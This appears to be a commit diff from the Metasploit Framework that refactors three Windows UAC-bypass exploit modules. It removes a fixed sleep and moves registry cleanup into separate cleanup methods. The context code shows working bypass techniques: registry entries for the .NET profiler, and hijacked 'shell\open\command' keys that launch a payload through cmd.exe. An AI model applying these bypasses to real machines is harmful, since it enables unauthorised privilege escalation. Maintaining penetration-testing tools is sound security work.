Land #17350, Remove unnecesary sleep

Remove unnecesary sleep in several bypassuac modules
2022-12-12 17:45:10 -05:00 · 2022-12-12 17:45:10 -05:00 · d09aef7dc5
parent f534168636 5a66666b4d
commit d09aef7dc5
3 changed files with 48 additions and 36 deletions
--- a/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
+++ b/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
@ -105,6 +105,7 @@ class MetasploitModule < Msf::Exploit::Local
  end

  def exploit
+    @reg_keys = []
    check_permissions!
    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
@ -140,31 +141,30 @@ class MetasploitModule < Msf::Exploit::Local

    uuid = SecureRandom.uuid
    vprint_status("UUID = #{uuid}")
-    reg_keys = []
    # This reg key will not hurt anything in windows 10+, but is not required.
    unless sysinfo['OS'] =~ /Windows (2016|10)/
-      reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
+      @reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
                    value_name: '',
                    value_type: "REG_EXPAND_SZ",
                    value_value: payload_pathname,
                    delete_on_cleanup: false)
    end
-    reg_keys.push(key_name: "HKCU\\Environment",
+    @reg_keys.push(key_name: "HKCU\\Environment",
                  value_name: "COR_PROFILER",
                  value_type: "REG_SZ",
                  value_value: "{#{uuid}}",
                  delete_on_cleanup: false)
-    reg_keys.push(key_name: "HKCU\\Environment",
+    @reg_keys.push(key_name: "HKCU\\Environment",
                  value_name: "COR_ENABLE_PROFILING",
                  value_type: "REG_SZ",
                  value_value: "1",
                  delete_on_cleanup: false)
-    reg_keys.push(key_name: "HKCU\\Environment",
+    @reg_keys.push(key_name: "HKCU\\Environment",
                  value_name: "COR_PROFILER_PATH",
                  value_type: "REG_SZ",
                  value_value: payload_pathname,
                  delete_on_cleanup: false)
-    reg_keys.each do |key_hash|
+    @reg_keys.each do |key_hash|
      write_reg_value(key_hash)
    end

@ -179,15 +179,18 @@ class MetasploitModule < Msf::Exploit::Local
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error(e.to_s)
    end
-    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
-    # wait for a few seconds before cleaning up
+    print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
    print_status("Please wait for session and cleanup....")
-    sleep(20)
-    vprint_status("Removing Registry Changes")
-    reg_keys.each do |key_hash|
-      remove_reg_value(key_hash)
+  end
+
+  def cleanup
+    if @reg_keys.present?
+      vprint_status("Removing Registry Changes")
+      @reg_keys.each do |key_hash|
+        remove_reg_value(key_hash)
+      end
+      vprint_status("Registry Changes Removed")
    end
-    vprint_status("Registry Changes Removed")
  end

  def check_permissions!
--- a/modules/exploits/windows/local/bypassuac_sdclt.rb
+++ b/modules/exploits/windows/local/bypassuac_sdclt.rb
@ -79,6 +79,8 @@ class MetasploitModule < Msf::Exploit::Local
  end

  def exploit
+    @registry_key = ''
+    @remove_registry_key = false
    check_permissions!
    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
@ -95,8 +97,8 @@ class MetasploitModule < Msf::Exploit::Local
      return
    end

-    registry_key = 'HKCU\Software\Classes\Folder\shell\open\command'
-    remove_registry_key = !registry_key_exist?(registry_key)
+    @registry_key = 'HKCU\Software\Classes\Folder\shell\open\command'
+    @remove_registry_key = !registry_key_exist?(@registry_key)

    # get directory locations straight
    win_dir = session.sys.config.getenv('windir')
@ -116,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Local
    payload = generate_payload_exe
    reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
    vprint_status("reg_command = " + reg_command)
-    write_reg_values(registry_key, reg_command)
+    write_reg_values(@registry_key, reg_command)

    # Upload payload
    vprint_status("Uploading Payload to #{payload_pathname}")
@ -129,18 +131,21 @@ class MetasploitModule < Msf::Exploit::Local
    rescue ::Exception => e
      print_error("Executing command failed:\n#{e}")
    end
-    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
-    # wait for a few seconds before cleaning up
+    print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
    print_status("Please wait for session and cleanup....")
-    sleep(20)
-    vprint_status("Removing Registry Changes")
-    if remove_registry_key
-      registry_deletekey(registry_key)
-    else
-      registry_deleteval(registry_key, "DelegateExecute")
-      registry_deleteval(registry_key, '')
+  end
+
+  def cleanup
+    if @registry_key.present?
+      vprint_status("Removing Registry Changes")
+      if @remove_registry_key
+        registry_deletekey(@registry_key)
+      else
+        registry_deleteval(@registry_key, "DelegateExecute")
+        registry_deleteval(@registry_key, '')
+      end
+      print_status("Registry Changes Removed")
    end
-    print_status("Registry Changes Removed")
  end

  def check_permissions!
--- a/modules/exploits/windows/local/bypassuac_windows_store_reg.rb
+++ b/modules/exploits/windows/local/bypassuac_windows_store_reg.rb
@ -69,6 +69,7 @@ class MetasploitModule < Msf::Exploit::Local
  end

  def exploit
+    @registry_key = ''
    check_permissions!
    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
@ -103,14 +104,14 @@ class MetasploitModule < Msf::Exploit::Local
    payload = generate_payload_exe
    reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
    vprint_status("reg_command = " + reg_command)
-    registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
+    @registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"

    # make registry changes
    vprint_status("Making Registry Changes")
    begin
-      registry_createkey(registry_key)
-      registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ")
-      registry_setvaldata(registry_key, '', reg_command, "REG_SZ")
+      registry_createkey(@registry_key)
+      registry_setvaldata(@registry_key, "DelegateExecute", '', "REG_SZ")
+      registry_setvaldata(@registry_key, '', reg_command, "REG_SZ")
    rescue ::Exception => e
      print_error(e.to_s)
    end
@ -126,12 +127,15 @@ class MetasploitModule < Msf::Exploit::Local
    rescue ::Exception => e
      print_error(e.to_s)
    end
-    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
-    # wait for a few seconds before cleaning up
-    sleep(20)
-    vprint_status("Removing Registry Changes")
-    registry_deletekey(registry_key)
-    vprint_status("Registry Changes Removed")
+    print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
+  end
+
+  def cleanup
+    if @registry_key.present?
+      vprint_status("Removing Registry Changes")
+      registry_deletekey(@registry_key)
+      vprint_status("Registry Changes Removed")
+    end
  end

  def check_permissions!